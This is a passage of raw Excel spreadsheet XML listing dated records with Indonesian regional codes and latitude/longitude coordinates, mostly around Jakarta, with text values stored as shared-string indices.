      <c r="I2348" t="s">
        <v>517</v>
      </c>
      <c r="J2348" t="s">
        <v>6648</v>
      </c>
      <c r="L2348" t="s">
        <v>7912</v>
      </c>
      <c r="M2348">
        <v>3174070004</v>
      </c>
      <c r="N2348">
        <v>3174070</v>
      </c>
      <c r="O2348">
        <v>3174</v>
      </c>
      <c r="P2348">
        <v>31</v>
      </c>
      <c r="Q2348" t="s">
        <v>926</v>
      </c>
      <c r="R2348" t="s">
        <v>84</v>
      </c>
      <c r="S2348" t="s">
        <v>32</v>
      </c>
      <c r="T2348" t="s">
        <v>33</v>
      </c>
      <c r="U2348" s="5">
        <v>10674982</v>
      </c>
      <c r="V2348" s="5" t="s">
        <v>16545</v>
      </c>
      <c r="W2348" s="5">
        <v>-613903</v>
      </c>
      <c r="X2348" t="s">
        <v>20288</v>
      </c>
      <c r="Y2348" t="str">
        <f t="shared" si="36"/>
        <v>-6.13903,106.74982</v>
      </c>
    </row>
    <row r="2349" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2349">
        <v>201655</v>
      </c>
      <c r="B2349" s="1">
        <v>44095</v>
      </c>
      <c r="C2349" s="2">
        <v>0.80027777777777775</v>
      </c>
      <c r="D2349" t="s">
        <v>22</v>
      </c>
      <c r="E2349" t="s">
        <v>23</v>
      </c>
      <c r="F2349" t="s">
        <v>7913</v>
      </c>
      <c r="H2349" t="s">
        <v>26</v>
      </c>
      <c r="I2349" t="s">
        <v>383</v>
      </c>
      <c r="J2349" t="s">
        <v>2608</v>
      </c>
      <c r="L2349" t="s">
        <v>7914</v>
      </c>
      <c r="M2349">
        <v>3321050017</v>
      </c>
      <c r="N2349">
        <v>3321050</v>
      </c>
      <c r="O2349">
        <v>3321</v>
      </c>
      <c r="P2349">
        <v>33</v>
      </c>
      <c r="Q2349" t="s">
        <v>7335</v>
      </c>
      <c r="R2349" t="s">
        <v>760</v>
      </c>
      <c r="S2349" t="s">
        <v>1428</v>
      </c>
      <c r="T2349" t="s">
        <v>1134</v>
      </c>
      <c r="U2349" s="5">
        <v>11053420</v>
      </c>
      <c r="V2349" s="5" t="s">
        <v>16546</v>
      </c>
      <c r="W2349" s="5">
        <v>-684044</v>
      </c>
      <c r="X2349" t="s">
        <v>20289</v>
      </c>
      <c r="Y2349" t="str">
        <f t="shared" si="36"/>
        <v>-6.84044,110.53420</v>
      </c>
    </row>
    <row r="2350" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2350">
        <v>201881</v>
      </c>
      <c r="B2350" s="1">
        <v>44095</v>
      </c>
      <c r="C2350" s="2">
        <v>0.88762731481481483</v>
      </c>
      <c r="D2350" t="s">
        <v>22</v>
      </c>
      <c r="E2350" t="s">
        <v>23</v>
      </c>
      <c r="F2350" t="s">
        <v>7915</v>
      </c>
      <c r="G2350" t="s">
        <v>7916</v>
      </c>
      <c r="H2350" t="s">
        <v>26</v>
      </c>
      <c r="I2350" t="s">
        <v>7917</v>
      </c>
      <c r="J2350" t="s">
        <v>1551</v>
      </c>
      <c r="L2350" t="s">
        <v>7918</v>
      </c>
      <c r="M2350">
        <v>3174040006</v>
      </c>
      <c r="N2350">
        <v>3174040</v>
      </c>
      <c r="O2350">
        <v>3174</v>
      </c>
      <c r="P2350">
        <v>31</v>
      </c>
      <c r="Q2350" t="s">
        <v>1553</v>
      </c>
      <c r="R2350" t="s">
        <v>377</v>
      </c>
      <c r="S2350" t="s">
        <v>32</v>
      </c>
      <c r="T2350" t="s">
        <v>33</v>
      </c>
      <c r="U2350" s="5">
        <v>10677422</v>
      </c>
      <c r="V2350" s="5" t="s">
        <v>16547</v>
      </c>
      <c r="W2350" s="5">
        <v>-615156</v>
      </c>
      <c r="X2350" t="s">
        <v>20290</v>
      </c>
      <c r="Y2350" t="str">
        <f t="shared" si="36"/>
        <v>-6.15156,106.77422</v>
      </c>
    </row>
    <row r="2351" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2351">
        <v>201928</v>
      </c>
      <c r="B2351" s="1">
        <v>44095</v>
      </c>
      <c r="C2351" s="2">
        <v>0.64374999999999993</v>
      </c>
      <c r="D2351" t="s">
        <v>2648</v>
      </c>
      <c r="E2351" t="s">
        <v>23</v>
      </c>
      <c r="G2351" t="s">
        <v>7919</v>
      </c>
      <c r="H2351" t="s">
        <v>26</v>
      </c>
      <c r="J2351" t="s">
        <v>1108</v>
      </c>
      <c r="L2351" t="s">
        <v>7920</v>
      </c>
      <c r="M2351">
        <v>3174020005</v>
      </c>
      <c r="N2351">
        <v>3174020</v>
      </c>
      <c r="O2351">
        <v>3174</v>
      </c>
      <c r="P2351">
        <v>31</v>
      </c>
      <c r="Q2351" t="s">
        <v>30</v>
      </c>
      <c r="R2351" t="s">
        <v>31</v>
      </c>
      <c r="S2351" t="s">
        <v>32</v>
      </c>
      <c r="T2351" t="s">
        <v>33</v>
      </c>
      <c r="U2351" s="5">
        <v>10677761</v>
      </c>
      <c r="V2351" s="5" t="s">
        <v>16548</v>
      </c>
      <c r="W2351" s="5">
        <v>-618034</v>
      </c>
      <c r="X2351" t="s">
        <v>20291</v>
      </c>
      <c r="Y2351" t="str">
        <f t="shared" si="36"/>
        <v>-6.18034,106.77761</v>
      </c>
    </row>
    <row r="2352" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2352">
        <v>201929</v>
      </c>
      <c r="B2352" s="1">
        <v>44095</v>
      </c>
      <c r="C2352" s="2">
        <v>0.75902777777777775</v>
      </c>
      <c r="D2352" t="s">
        <v>2648</v>
      </c>
      <c r="E2352" t="s">
        <v>23</v>
      </c>
      <c r="G2352" t="s">
        <v>7921</v>
      </c>
      <c r="H2352" t="s">
        <v>26</v>
      </c>
      <c r="J2352" t="s">
        <v>28</v>
      </c>
      <c r="L2352" t="s">
        <v>7922</v>
      </c>
      <c r="M2352">
        <v>3174020005</v>
      </c>
      <c r="N2352">
        <v>3174020</v>
      </c>
      <c r="O2352">
        <v>3174</v>
      </c>
      <c r="P2352">
        <v>31</v>
      </c>
      <c r="Q2352" t="s">
        <v>30</v>
      </c>
      <c r="R2352" t="s">
        <v>31</v>
      </c>
      <c r="S2352" t="s">
        <v>32</v>
      </c>
      <c r="T2352" t="s">
        <v>33</v>
      </c>
      <c r="U2352" s="5">
        <v>10677040</v>
      </c>
      <c r="V2352" s="5" t="s">
        <v>16512</v>
      </c>
      <c r="W2352" s="5">
        <v>-616835</v>
      </c>
      <c r="X2352" t="s">
        <v>18378</v>
      </c>
      <c r="Y2352" t="str">
        <f t="shared" si="36"/>
        <v>-6.16835,106.77040</v>
      </c>
    </row>
    <row r="2353" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2353">
        <v>201933</v>
      </c>
      <c r="B2353" s="1">
        <v>44095</v>
      </c>
      <c r="C2353" s="2">
        <v>0.63750000000000007</v>
      </c>
      <c r="D2353" t="s">
        <v>2648</v>
      </c>
      <c r="E2353" t="s">
        <v>23</v>
      </c>
      <c r="G2353" t="s">
        <v>7923</v>
      </c>
      <c r="H2353" t="s">
        <v>26</v>
      </c>
      <c r="J2353" t="s">
        <v>894</v>
      </c>
      <c r="L2353" t="s">
        <v>7924</v>
      </c>
      <c r="M2353">
        <v>3174020005</v>
      </c>
      <c r="N2353">
        <v>3174020</v>
      </c>
      <c r="O2353">
        <v>3174</v>
      </c>
      <c r="P2353">
        <v>31</v>
      </c>
      <c r="Q2353" t="s">
        <v>30</v>
      </c>
      <c r="R2353" t="s">
        <v>31</v>
      </c>
      <c r="S2353" t="s">
        <v>32</v>
      </c>
      <c r="T2353" t="s">
        <v>33</v>
      </c>
      <c r="U2353" s="5">
        <v>10677594</v>
      </c>
      <c r="V2353" s="5" t="s">
        <v>16549</v>
      </c>
      <c r="W2353" s="5">
        <v>-617239</v>
      </c>
      <c r="X2353" t="s">
        <v>20292</v>
      </c>
      <c r="Y2353" t="str">
        <f t="shared" si="36"/>
        <v>-6.17239,106.77594</v>
      </c>
    </row>
    <row r="2354" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2354">
        <v>202308</v>
      </c>
      <c r="B2354" s="1">
        <v>44095</v>
      </c>
      <c r="C2354" s="2">
        <v>0.99513888888888891</v>
      </c>
      <c r="D2354" t="s">
        <v>2648</v>
      </c>
      <c r="E2354" t="s">
        <v>23</v>
      </c>
      <c r="G2354" t="s">
        <v>7925</v>
      </c>
      <c r="H2354" t="s">
        <v>26</v>
      </c>
      <c r="J2354" t="s">
        <v>404</v>
      </c>
      <c r="L2354" t="s">
        <v>7926</v>
      </c>
      <c r="M2354">
        <v>3174020005</v>
      </c>
      <c r="N2354">
        <v>3174020</v>
      </c>
      <c r="O2354">
        <v>3174</v>
      </c>
      <c r="P2354">
        <v>31</v>
      </c>
      <c r="Q2354" t="s">
        <v>30</v>
      </c>
      <c r="R2354" t="s">
        <v>31</v>
      </c>
      <c r="S2354" t="s">
        <v>32</v>
      </c>
      <c r="T2354" t="s">
        <v>33</v>
      </c>
      <c r="U2354" s="5">
        <v>10677036</v>
      </c>
      <c r="V2354" s="5" t="s">
        <v>16550</v>
      </c>
      <c r="W2354" s="5">
        <v>-616632</v>
      </c>
      <c r="X2354" t="s">
        <v>19322</v>
      </c>
      <c r="Y2354" t="str">
        <f t="shared" si="36"/>
        <v>-6.16632,106.77036</v>
      </c>
    </row>
    <row r="2355" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2355">
        <v>202536</v>
      </c>
      <c r="B2355" s="1">
        <v>44095</v>
      </c>
      <c r="C2355" s="2">
        <v>0.94901620370370365</v>
      </c>
      <c r="D2355" t="s">
        <v>85</v>
      </c>
      <c r="E2355" t="s">
        <v>23</v>
      </c>
      <c r="F2355" t="s">
        <v>7927</v>
      </c>
      <c r="G2355" t="s">
        <v>7928</v>
      </c>
      <c r="H2355" t="s">
        <v>26</v>
      </c>
      <c r="J2355" t="s">
        <v>306</v>
      </c>
      <c r="K2355" t="s">
        <v>7929</v>
      </c>
      <c r="L2355" t="s">
        <v>7930</v>
      </c>
      <c r="M2355">
        <v>3172060001</v>
      </c>
      <c r="N2355">
        <v>3172060</v>
      </c>
      <c r="O2355">
        <v>3172</v>
      </c>
      <c r="P2355">
        <v>31</v>
      </c>
      <c r="Q2355" t="s">
        <v>309</v>
      </c>
      <c r="R2355" t="s">
        <v>48</v>
      </c>
      <c r="S2355" t="s">
        <v>49</v>
      </c>
      <c r="T2355" t="s">
        <v>33</v>
      </c>
      <c r="U2355" s="5">
        <v>10686719</v>
      </c>
      <c r="V2355" s="5" t="s">
        <v>14719</v>
      </c>
      <c r="W2355" s="5">
        <v>-623843</v>
      </c>
      <c r="X2355" t="s">
        <v>18470</v>
      </c>
      <c r="Y2355" t="str">
        <f t="shared" si="36"/>
        <v>-6.23843,106.86719</v>
      </c>
    </row>
    <row r="2356" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2356">
        <v>202307</v>
      </c>
      <c r="B2356" s="1">
        <v>44096</v>
      </c>
      <c r="C2356" s="2">
        <v>9.0277777777777787E-3</v>
      </c>
      <c r="D2356" t="s">
        <v>2648</v>
      </c>
      <c r="E2356" t="s">
        <v>23</v>
      </c>
      <c r="G2356" t="s">
        <v>7931</v>
      </c>
      <c r="H2356" t="s">
        <v>26</v>
      </c>
      <c r="J2356" t="s">
        <v>404</v>
      </c>
      <c r="L2356" t="s">
        <v>7926</v>
      </c>
      <c r="M2356">
        <v>3174020005</v>
      </c>
      <c r="N2356">
        <v>3174020</v>
      </c>
      <c r="O2356">
        <v>3174</v>
      </c>
      <c r="P2356">
        <v>31</v>
      </c>
      <c r="Q2356" t="s">
        <v>30</v>
      </c>
      <c r="R2356" t="s">
        <v>31</v>
      </c>
      <c r="S2356" t="s">
        <v>32</v>
      </c>
      <c r="T2356" t="s">
        <v>33</v>
      </c>
      <c r="U2356" s="5">
        <v>10677027</v>
      </c>
      <c r="V2356" s="5" t="s">
        <v>16551</v>
      </c>
      <c r="W2356" s="5">
        <v>-616644</v>
      </c>
      <c r="X2356" t="s">
        <v>20293</v>
      </c>
      <c r="Y2356" t="str">
        <f t="shared" si="36"/>
        <v>-6.16644,106.77027</v>
      </c>
    </row>
    <row r="2357" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2357">
        <v>202345</v>
      </c>
      <c r="B2357" s="1">
        <v>44096</v>
      </c>
      <c r="C2357" s="2">
        <v>6.293981481481481E-2</v>
      </c>
      <c r="D2357" t="s">
        <v>22</v>
      </c>
      <c r="E2357" t="s">
        <v>23</v>
      </c>
      <c r="F2357" t="s">
        <v>7932</v>
      </c>
      <c r="G2357" t="s">
        <v>7933</v>
      </c>
      <c r="H2357" t="s">
        <v>26</v>
      </c>
      <c r="I2357" t="s">
        <v>1604</v>
      </c>
      <c r="J2357" t="s">
        <v>894</v>
      </c>
      <c r="L2357" t="s">
        <v>7934</v>
      </c>
      <c r="M2357">
        <v>3174020005</v>
      </c>
      <c r="N2357">
        <v>3174020</v>
      </c>
      <c r="O2357">
        <v>3174</v>
      </c>
      <c r="P2357">
        <v>31</v>
      </c>
      <c r="Q2357" t="s">
        <v>30</v>
      </c>
      <c r="R2357" t="s">
        <v>31</v>
      </c>
      <c r="S2357" t="s">
        <v>32</v>
      </c>
      <c r="T2357" t="s">
        <v>33</v>
      </c>
      <c r="U2357" s="5">
        <v>10677333</v>
      </c>
      <c r="V2357" s="5" t="s">
        <v>16552</v>
      </c>
      <c r="W2357" s="5">
        <v>-617170</v>
      </c>
      <c r="X2357" t="s">
        <v>20294</v>
      </c>
      <c r="Y2357" t="str">
        <f t="shared" si="36"/>
        <v>-6.17170,106.77333</v>
      </c>
    </row>
    <row r="2358" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2358">
        <v>202368</v>
      </c>
      <c r="B2358" s="1">
        <v>44096</v>
      </c>
      <c r="C2358" s="2">
        <v>6.987268518518519E-2</v>
      </c>
      <c r="D2358" t="s">
        <v>22</v>
      </c>
      <c r="E2358" t="s">
        <v>23</v>
      </c>
      <c r="F2358" t="s">
        <v>7935</v>
      </c>
      <c r="H2358" t="s">
        <v>26</v>
      </c>
      <c r="I2358" t="s">
        <v>517</v>
      </c>
      <c r="J2358" t="s">
        <v>7399</v>
      </c>
      <c r="L2358" t="s">
        <v>7936</v>
      </c>
      <c r="M2358">
        <v>1473031001</v>
      </c>
      <c r="N2358">
        <v>1473031</v>
      </c>
      <c r="O2358">
        <v>1473</v>
      </c>
      <c r="P2358">
        <v>14</v>
      </c>
      <c r="Q2358" t="s">
        <v>7937</v>
      </c>
      <c r="R2358" t="s">
        <v>7938</v>
      </c>
      <c r="S2358" t="s">
        <v>7939</v>
      </c>
      <c r="T2358" t="s">
        <v>7404</v>
      </c>
      <c r="U2358" s="5">
        <v>10143493</v>
      </c>
      <c r="V2358" s="5" t="s">
        <v>16553</v>
      </c>
      <c r="W2358" s="5">
        <v>167316</v>
      </c>
      <c r="X2358" t="s">
        <v>20295</v>
      </c>
      <c r="Y2358" t="str">
        <f t="shared" si="36"/>
        <v>1.67316,101.43493</v>
      </c>
    </row>
    <row r="2359" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2359">
        <v>202391</v>
      </c>
      <c r="B2359" s="1">
        <v>44096</v>
      </c>
      <c r="C2359" s="2">
        <v>7.3969907407407401E-2</v>
      </c>
      <c r="D2359" t="s">
        <v>22</v>
      </c>
      <c r="E2359" t="s">
        <v>23</v>
      </c>
      <c r="F2359" t="s">
        <v>7940</v>
      </c>
      <c r="G2359" t="s">
        <v>7941</v>
      </c>
      <c r="H2359" t="s">
        <v>26</v>
      </c>
      <c r="I2359" t="s">
        <v>3024</v>
      </c>
      <c r="J2359" t="s">
        <v>894</v>
      </c>
      <c r="L2359" t="s">
        <v>7942</v>
      </c>
      <c r="M2359">
        <v>3174020005</v>
      </c>
      <c r="N2359">
        <v>3174020</v>
      </c>
      <c r="O2359">
        <v>3174</v>
      </c>
      <c r="P2359">
        <v>31</v>
      </c>
      <c r="Q2359" t="s">
        <v>30</v>
      </c>
      <c r="R2359" t="s">
        <v>31</v>
      </c>
      <c r="S2359" t="s">
        <v>32</v>
      </c>
      <c r="T2359" t="s">
        <v>33</v>
      </c>
      <c r="U2359" s="5">
        <v>10677416</v>
      </c>
      <c r="V2359" s="5" t="s">
        <v>16554</v>
      </c>
      <c r="W2359" s="5">
        <v>-617167</v>
      </c>
      <c r="X2359" t="s">
        <v>20296</v>
      </c>
      <c r="Y2359" t="str">
        <f t="shared" si="36"/>
        <v>-6.17167,106.77416</v>
      </c>
    </row>
    <row r="2360" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2360">
        <v>202559</v>
      </c>
      <c r="B2360" s="1">
        <v>44096</v>
      </c>
      <c r="C2360" s="2">
        <v>0.1198263888888889</v>
      </c>
      <c r="D2360" t="s">
        <v>85</v>
      </c>
      <c r="E2360" t="s">
        <v>23</v>
      </c>
      <c r="F2360" t="s">
        <v>7943</v>
      </c>
      <c r="G2360" t="s">
        <v>7944</v>
      </c>
      <c r="H2360" t="s">
        <v>26</v>
      </c>
      <c r="J2360" t="s">
        <v>3135</v>
      </c>
      <c r="K2360" t="s">
        <v>7945</v>
      </c>
      <c r="L2360" t="s">
        <v>7946</v>
      </c>
      <c r="M2360">
        <v>3671012005</v>
      </c>
      <c r="N2360">
        <v>3671012</v>
      </c>
      <c r="O2360">
        <v>3671</v>
      </c>
      <c r="P2360">
        <v>36</v>
      </c>
      <c r="Q2360" t="s">
        <v>5517</v>
      </c>
      <c r="R2360" t="s">
        <v>760</v>
      </c>
      <c r="S2360" t="s">
        <v>201</v>
      </c>
      <c r="T2360" t="s">
        <v>171</v>
      </c>
      <c r="U2360" s="5">
        <v>10671716</v>
      </c>
      <c r="V2360" s="5" t="s">
        <v>16555</v>
      </c>
      <c r="W2360" s="5">
        <v>-620358</v>
      </c>
      <c r="X2360" t="s">
        <v>20297</v>
      </c>
      <c r="Y2360" t="str">
        <f t="shared" si="36"/>
        <v>-6.20358,106.71716</v>
      </c>
    </row>
    <row r="2361" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2361">
        <v>202749</v>
      </c>
      <c r="B2361" s="1">
        <v>44096</v>
      </c>
      <c r="C2361" s="2">
        <v>0.18541666666666667</v>
      </c>
      <c r="D2361" t="s">
        <v>2648</v>
      </c>
      <c r="E2361" t="s">
        <v>23</v>
      </c>
      <c r="G2361" t="s">
        <v>7947</v>
      </c>
      <c r="H2361" t="s">
        <v>26</v>
      </c>
      <c r="J2361" t="s">
        <v>728</v>
      </c>
      <c r="L2361" t="s">
        <v>7948</v>
      </c>
      <c r="M2361">
        <v>3174040001</v>
      </c>
      <c r="N2361">
        <v>3174040</v>
      </c>
      <c r="O2361">
        <v>3174</v>
      </c>
      <c r="P2361">
        <v>31</v>
      </c>
      <c r="Q2361" t="s">
        <v>730</v>
      </c>
      <c r="R2361" t="s">
        <v>377</v>
      </c>
      <c r="S2361" t="s">
        <v>32</v>
      </c>
      <c r="T2361" t="s">
        <v>33</v>
      </c>
      <c r="U2361" s="5">
        <v>10678064</v>
      </c>
      <c r="V2361" s="5" t="s">
        <v>16556</v>
      </c>
      <c r="W2361" s="5">
        <v>-616971</v>
      </c>
      <c r="X2361" t="s">
        <v>20298</v>
      </c>
      <c r="Y2361" t="str">
        <f t="shared" si="36"/>
        <v>-6.16971,106.78064</v>
      </c>
    </row>
    <row r="2362" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2362">
        <v>203506</v>
      </c>
      <c r="B2362" s="1">
        <v>44096</v>
      </c>
      <c r="C2362" s="2">
        <v>0.41736111111111113</v>
      </c>
      <c r="D2362" t="s">
        <v>2648</v>
      </c>
      <c r="E2362" t="s">
        <v>23</v>
      </c>
      <c r="G2362" t="s">
        <v>7949</v>
      </c>
      <c r="H2362" t="s">
        <v>26</v>
      </c>
      <c r="J2362" t="s">
        <v>7717</v>
      </c>
      <c r="L2362" t="s">
        <v>7950</v>
      </c>
      <c r="M2362">
        <v>3174080004</v>
      </c>
      <c r="N2362">
        <v>3174080</v>
      </c>
      <c r="O2362">
        <v>3174</v>
      </c>
      <c r="P2362">
        <v>31</v>
      </c>
      <c r="Q2362" t="s">
        <v>1696</v>
      </c>
      <c r="R2362" t="s">
        <v>695</v>
      </c>
      <c r="S2362" t="s">
        <v>32</v>
      </c>
      <c r="T2362" t="s">
        <v>33</v>
      </c>
      <c r="U2362" s="5">
        <v>10672990</v>
      </c>
      <c r="V2362" s="5" t="s">
        <v>16557</v>
      </c>
      <c r="W2362" s="5">
        <v>-612153</v>
      </c>
      <c r="X2362" t="s">
        <v>20299</v>
      </c>
      <c r="Y2362" t="str">
        <f t="shared" si="36"/>
        <v>-6.12153,106.72990</v>
      </c>
    </row>
    <row r="2363" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2363">
        <v>203586</v>
      </c>
      <c r="B2363" s="1">
        <v>44096</v>
      </c>
      <c r="C2363" s="2">
        <v>0.43958333333333338</v>
      </c>
      <c r="D2363" t="s">
        <v>2648</v>
      </c>
      <c r="E2363" t="s">
        <v>23</v>
      </c>
      <c r="G2363" t="s">
        <v>7951</v>
      </c>
      <c r="H2363" t="s">
        <v>26</v>
      </c>
      <c r="J2363" t="s">
        <v>7717</v>
      </c>
      <c r="L2363" t="s">
        <v>7952</v>
      </c>
      <c r="M2363">
        <v>3174080004</v>
      </c>
      <c r="N2363">
        <v>3174080</v>
      </c>
      <c r="O2363">
        <v>3174</v>
      </c>
      <c r="P2363">
        <v>31</v>
      </c>
      <c r="Q2363" t="s">
        <v>1696</v>
      </c>
      <c r="R2363" t="s">
        <v>695</v>
      </c>
      <c r="S2363" t="s">
        <v>32</v>
      </c>
      <c r="T2363" t="s">
        <v>33</v>
      </c>
      <c r="U2363" s="5">
        <v>10672990</v>
      </c>
      <c r="V2363" s="5" t="s">
        <v>16557</v>
      </c>
      <c r="W2363" s="5">
        <v>-612141</v>
      </c>
      <c r="X2363" t="s">
        <v>20300</v>
      </c>
      <c r="Y2363" t="str">
        <f t="shared" si="36"/>
        <v>-6.12141,106.72990</v>
      </c>
    </row>
    <row r="2364" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2364">
        <v>203665</v>
      </c>
      <c r="B2364" s="1">
        <v>44096</v>
      </c>
      <c r="C2364" s="2">
        <v>0.4604166666666667</v>
      </c>
      <c r="D2364" t="s">
        <v>2648</v>
      </c>
      <c r="E2364" t="s">
        <v>23</v>
      </c>
      <c r="G2364" t="s">
        <v>7953</v>
      </c>
      <c r="H2364" t="s">
        <v>26</v>
      </c>
      <c r="J2364" t="s">
        <v>7717</v>
      </c>
      <c r="L2364" t="s">
        <v>7954</v>
      </c>
      <c r="M2364">
        <v>3174080004</v>
      </c>
      <c r="N2364">
        <v>3174080</v>
      </c>
      <c r="O2364">
        <v>3174</v>
      </c>
      <c r="P2364">
        <v>31</v>
      </c>
      <c r="Q2364" t="s">
        <v>1696</v>
      </c>
      <c r="R2364" t="s">
        <v>695</v>
      </c>
      <c r="S2364" t="s">
        <v>32</v>
      </c>
      <c r="T2364" t="s">
        <v>33</v>
      </c>
      <c r="U2364" s="5">
        <v>10672991</v>
      </c>
      <c r="V2364" s="5" t="s">
        <v>16558</v>
      </c>
      <c r="W2364" s="5">
        <v>-612152</v>
      </c>
      <c r="X2364" t="s">
        <v>20301</v>
      </c>
      <c r="Y2364" t="str">
        <f t="shared" si="36"/>
        <v>-6.12152,106.72991</v>
      </c>
    </row>
    <row r="2365" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2365">
        <v>207022</v>
      </c>
      <c r="B2365" s="1">
        <v>44097</v>
      </c>
      <c r="C2365" s="2">
        <v>0.5444444444444444</v>
      </c>
      <c r="D2365" t="s">
        <v>2648</v>
      </c>
      <c r="E2365" t="s">
        <v>23</v>
      </c>
      <c r="G2365" t="s">
        <v>7955</v>
      </c>
      <c r="H2365" t="s">
        <v>26</v>
      </c>
      <c r="J2365" t="s">
        <v>7956</v>
      </c>
      <c r="L2365" t="s">
        <v>7957</v>
      </c>
      <c r="M2365">
        <v>3175020003</v>
      </c>
      <c r="N2365">
        <v>3175020</v>
      </c>
      <c r="O2365">
        <v>3175</v>
      </c>
      <c r="P2365">
        <v>31</v>
      </c>
      <c r="Q2365" t="s">
        <v>2667</v>
      </c>
      <c r="R2365" t="s">
        <v>2228</v>
      </c>
      <c r="S2365" t="s">
        <v>547</v>
      </c>
      <c r="T2365" t="s">
        <v>33</v>
      </c>
      <c r="U2365" s="5">
        <v>10682251</v>
      </c>
      <c r="V2365" s="5" t="s">
        <v>16559</v>
      </c>
      <c r="W2365" s="5">
        <v>-613271</v>
      </c>
      <c r="X2365" t="s">
        <v>20302</v>
      </c>
      <c r="Y2365" t="str">
        <f t="shared" si="36"/>
        <v>-6.13271,106.82251</v>
      </c>
    </row>
    <row r="2366" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2366">
        <v>207026</v>
      </c>
      <c r="B2366" s="1">
        <v>44097</v>
      </c>
      <c r="C2366" s="2">
        <v>0.54652777777777783</v>
      </c>
      <c r="D2366" t="s">
        <v>2648</v>
      </c>
      <c r="E2366" t="s">
        <v>23</v>
      </c>
      <c r="G2366" t="s">
        <v>7958</v>
      </c>
      <c r="H2366" t="s">
        <v>26</v>
      </c>
      <c r="J2366" t="s">
        <v>7956</v>
      </c>
      <c r="L2366" t="s">
        <v>7959</v>
      </c>
      <c r="M2366">
        <v>3175020003</v>
      </c>
      <c r="N2366">
        <v>3175020</v>
      </c>
      <c r="O2366">
        <v>3175</v>
      </c>
      <c r="P2366">
        <v>31</v>
      </c>
      <c r="Q2366" t="s">
        <v>2667</v>
      </c>
      <c r="R2366" t="s">
        <v>2228</v>
      </c>
      <c r="S2366" t="s">
        <v>547</v>
      </c>
      <c r="T2366" t="s">
        <v>33</v>
      </c>
      <c r="U2366" s="5">
        <v>10682236</v>
      </c>
      <c r="V2366" s="5" t="s">
        <v>16560</v>
      </c>
      <c r="W2366" s="5">
        <v>-613206</v>
      </c>
      <c r="X2366" t="s">
        <v>20303</v>
      </c>
      <c r="Y2366" t="str">
        <f t="shared" si="36"/>
        <v>-6.13206,106.82236</v>
      </c>
    </row>
    <row r="2367" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2367">
        <v>207066</v>
      </c>
      <c r="B2367" s="1">
        <v>44097</v>
      </c>
      <c r="C2367" s="2">
        <v>0.57628472222222216</v>
      </c>
      <c r="D2367" t="s">
        <v>22</v>
      </c>
      <c r="E2367" t="s">
        <v>23</v>
      </c>
      <c r="F2367" t="s">
        <v>7960</v>
      </c>
      <c r="G2367" t="s">
        <v>7961</v>
      </c>
      <c r="H2367" t="s">
        <v>26</v>
      </c>
      <c r="I2367" t="s">
        <v>886</v>
      </c>
      <c r="J2367" t="s">
        <v>7509</v>
      </c>
      <c r="L2367" t="s">
        <v>7962</v>
      </c>
      <c r="M2367">
        <v>1302090007</v>
      </c>
      <c r="N2367">
        <v>1302090</v>
      </c>
      <c r="O2367">
        <v>1302</v>
      </c>
      <c r="P2367">
        <v>13</v>
      </c>
      <c r="Q2367" t="s">
        <v>7963</v>
      </c>
      <c r="R2367" t="s">
        <v>7964</v>
      </c>
      <c r="S2367" t="s">
        <v>7965</v>
      </c>
      <c r="T2367" t="s">
        <v>7514</v>
      </c>
      <c r="U2367" s="5">
        <v>10057489</v>
      </c>
      <c r="V2367" s="5" t="s">
        <v>16561</v>
      </c>
      <c r="W2367" s="5">
        <v>-135014</v>
      </c>
      <c r="X2367" t="s">
        <v>20304</v>
      </c>
      <c r="Y2367" t="str">
        <f t="shared" si="36"/>
        <v>-1.35014,100.57489</v>
      </c>
    </row>
    <row r="2368" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2368">
        <v>207654</v>
      </c>
      <c r="B2368" s="1">
        <v>44098</v>
      </c>
      <c r="C2368" s="2">
        <v>3.888888888888889E-2</v>
      </c>
      <c r="D2368" t="s">
        <v>2648</v>
      </c>
      <c r="E2368" t="s">
        <v>23</v>
      </c>
      <c r="G2368" t="s">
        <v>7966</v>
      </c>
      <c r="H2368" t="s">
        <v>26</v>
      </c>
      <c r="J2368" t="s">
        <v>2919</v>
      </c>
      <c r="L2368" t="s">
        <v>7967</v>
      </c>
      <c r="M2368">
        <v>3172090004</v>
      </c>
      <c r="N2368">
        <v>3172090</v>
      </c>
      <c r="O2368">
        <v>3172</v>
      </c>
      <c r="P2368">
        <v>31</v>
      </c>
      <c r="Q2368" t="s">
        <v>889</v>
      </c>
      <c r="R2368" t="s">
        <v>890</v>
      </c>
      <c r="S2368" t="s">
        <v>49</v>
      </c>
      <c r="T2368" t="s">
        <v>33</v>
      </c>
      <c r="U2368" s="5">
        <v>10689749</v>
      </c>
      <c r="V2368" s="5" t="s">
        <v>16562</v>
      </c>
      <c r="W2368" s="5">
        <v>-619787</v>
      </c>
      <c r="X2368" t="s">
        <v>20305</v>
      </c>
      <c r="Y2368" t="str">
        <f t="shared" si="36"/>
        <v>-6.19787,106.89749</v>
      </c>
    </row>
    <row r="2369" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2369">
        <v>208348</v>
      </c>
      <c r="B2369" s="1">
        <v>44101</v>
      </c>
      <c r="C2369" s="2">
        <v>4.7129629629629632E-2</v>
      </c>
      <c r="D2369" t="s">
        <v>85</v>
      </c>
      <c r="E2369" t="s">
        <v>23</v>
      </c>
      <c r="F2369" t="s">
        <v>7968</v>
      </c>
      <c r="G2369" t="s">
        <v>7969</v>
      </c>
      <c r="H2369" t="s">
        <v>26</v>
      </c>
      <c r="J2369" t="s">
        <v>7399</v>
      </c>
      <c r="K2369" t="s">
        <v>7970</v>
      </c>
      <c r="L2369" t="s">
        <v>7971</v>
      </c>
      <c r="M2369">
